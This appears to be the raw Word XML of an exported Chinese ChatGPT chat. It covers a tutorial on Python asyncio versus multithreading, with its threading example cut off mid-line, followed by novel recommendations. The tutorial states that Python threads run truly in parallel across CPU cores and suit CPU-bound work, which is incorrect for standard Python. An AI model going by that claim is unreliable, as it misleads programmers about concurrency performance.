    <w:p w14:paraId="0FD02282" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC884A8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def hello():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D95FA0C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print("Start")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA6701B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    await asyncio.sleep(1)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模拟耗时操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25279C2B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print("End")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9EE7DF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A325671" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的事件循环来运行上述的协程函数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182AED6B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41E2D679" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364AA711" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(hello())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F7F91C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C1CA162" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多线程和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的区别：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4167E9E5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A84BFFF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多线程和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都是实现并发的方式，但他们有明显的区别。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C67041" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14CD468E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多线程是利用计算机多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>核心实现真正的并行计算，每个线程都是独立的，有自己的上下文，切换需要花费一定的时间。而且，多线程编程中需要处理线程之间的通信问题，以及处理线程的同步和异步问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2218805E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21015444" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现的是单线程的并发，其核心是事件循环。协程的运行由事件循环控制，一个任务运行一段时间后，可以主动放弃</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的执行权，切换到其他任务上，这样实现了在单线程内多任务的并发执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0A7E6F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA137F8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用场景的区别：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FED2884" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="483840DF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多线程适合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密集型任务，例如大量的计算，因为多线程可以利用多核。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311D7AA9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F78274" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更适合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I/O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密集型任务，如网络请求、文件读写等，因为这些任务的主要时间花在等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I/O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>负载不高。使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以在等待时切换到其他任务，提高效率。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C548CE8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52AE8848" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>案例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAF107F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33187F8D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模拟多个网络请求的场景：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE20C87" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74077BBE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E232D05" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import aiohttp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0683028B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B054D49" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4572CB9A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def fetch(session, url):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF9A3F1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    async with session.get(url) as response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07133BF5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return await response.text()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EFCC99" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1588AB9A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372BF841" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    async with aiohttp.ClientSession() as session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDFB021" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        html = await fetch(session, 'http://python.org')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C74A5A7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print(html)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4203ABF8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21E91AB1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(main())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B1CABA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DBAED8D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和多线程的性能比较：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37382BF7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00FB7262" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495FD04D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>import asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC6E460" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18342A58" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24492200" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24AA1E09" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4F166A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def job():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1B9D80" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print('Start job')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14760BCC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await asyncio.sleep(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAF51DA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print('Job finished')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E3C946" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64AD5B4B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>start = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6994366B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(job())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F88F78" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print('Asyncio time:', time.time() - start)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA4DE4F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EF1764E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705486F8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def job():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CAC2DD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print('Start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA29257" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DD50FC3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CA84EE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>推荐几本好看的小说，我倾向于美剧剧情优秀的那一类。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415A772D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469AD596" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D00A5F9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你喜欢剧情丰富、多层次、细致描绘人物性格的小说，那么以下这些书可能会适合你：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEC0A10" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="664AE206" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>《权力的游戏》系列（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>George R.R. Martin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是一部极度复杂的奇幻系列小说，其剧情元素包含政治、家族、荣誉、爱情、背叛等等，可以说是非常丰富。如果你喜欢美剧《权力的游戏》，那么原著小说你一定会喜欢。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CDF4B1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35311573" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>《刺杀》系列（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Vince Flynn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是一部充满政治阴谋和惊心动魄的刺杀行动的系列小说，讲述了主角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mitch Rapp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何从一名普通人成长为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CIA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最重要的反恐特工。剧情紧凑、人物塑造深入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3710ACE0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15C4EDE3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>《末日之旅》（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Stephen King</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是一部描述病毒灾难后世界的惊悚小说，人性的复杂和善恶较量在书中被细致的描绘出来。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE6CF25" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A58254" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>《杀手安德森》（</w:t>
